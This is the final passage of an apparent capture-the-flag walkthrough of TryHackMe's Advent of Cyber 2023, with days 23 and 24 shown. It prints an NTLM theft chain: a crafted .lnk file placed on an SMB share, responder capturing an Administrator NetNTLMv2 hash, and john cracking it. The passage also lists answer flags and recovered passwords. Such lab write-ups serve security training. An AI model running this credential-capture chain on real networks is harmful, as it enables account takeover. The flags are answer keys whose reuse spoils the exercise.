cd stealthy/ root@ip-10-10-95-108:~/Rooms/AoC2023/Day23/ntlm_theft/stealthy# smbclient //10.10.151.231/ElfShare/ -U guest% WARNING: The "syslog" option is deprecated Try "help" to get a list of possible commands. smb: \> put stealthy.lnk putting file stealthy.lnk as \stealthy.lnk (105.7 kb/s) (average 105.7 kb/s) smb: \> dir . D 0 Sun Dec 24 15:40:27 2023 .. D 0 Sun Dec 24 15:40:27 2023 EXCO D 0 Wed Nov 22 11:07:20 2023 greedykeys.txt A 2446 Thu Nov 23 17:50:09 2023 HR D 0 Wed Nov 22 11:06:57 2023 IT D 0 Wed Nov 22 11:07:02 2023 SALES D 0 Wed Nov 22 11:07:05 2023 stealthy.lnk A 2164 Sun Dec 24 15:40:27 2023 SUPPORT
responder -I ens5
Administrator::ELFHQSERVER:871ce18588fdc631:68D7039B683632278BB51397F2266D7A:010100000000000000B4A1957F36DA01AC86F3E056200E6600000000020008005500330050004D0001001E00570049004E002D005600300048003800540057003700490038005A00420004003400570049004E002D005600300048003800540057003700490038005A0042002E005500330050004D002E004C004F00430041004C00030014005500330050004D002E004C004F00430041004C00050014005500330050004D002E004C004F00430041004C000700080000B4A1957F36DA0106000400020000000800300030000000000000000000000000300000BFE4FB2E8A189690B18DA31D8BC34A50DAFDD45CCBF5C0DC044B37C02320A1BF0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00390035002E003100300038000000000000000000
john --wordlist=greedykeys.txt hash.txt
GreedyGrabber1@
Question 5 – What is the value of the flag that is placed on the Administrator’s desktop?
THM{Greedy.Greedy.McNot.So.Great.Stealy}
Question 6 – If you enjoyed this task, feel free to check out the Compromising Active Directory module!
Done
Task 30 – [Day 24: Mobile Analysis] You Are on the Naughty List, McGreedy
Question 1 – One of the photos contains a flag. What is it?
THM{DIGITAL_FORENSICS}
Question 2 – What name does Tracy use to save Detective Frost-eau’s phone number?
Detective Carrot-Nose
Question 3 – One SMS exchanged with Van Sprinkles contains a password. What is it?
chee7AQu
Question 4 – If you have enjoyed this room please check out the Autopsy room.
Done
Task 31 – [Day 24: The Confrontation] Jolly Judgment Day
Question 1 – What is the final flag?
THM{YouMeddlingKids}
Task 32 [Day 24: The End] We the Kings of Cyber Are
Question 1 – Congratulations on finishing Advent of Cyber 2023! Only one thing left…
Done
Task 33 – [Day 24: Feedback] We wish you a Merry Survey
Question 1 – What flag did you get after completing the survey?
THM{SurveyComplete_and_HolidaysSaved}
Also Read: DVWA – Stored Cross Site Scripting (Low/Med/High)
So that was “Advent of Cyber 2023” for you. We looked into various challenges on topics like Machine Learning, Password Bruteforcing, Log Analysis, Reverse Engineering, Active Directory, Incident Response, Digital Forensics and much more. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.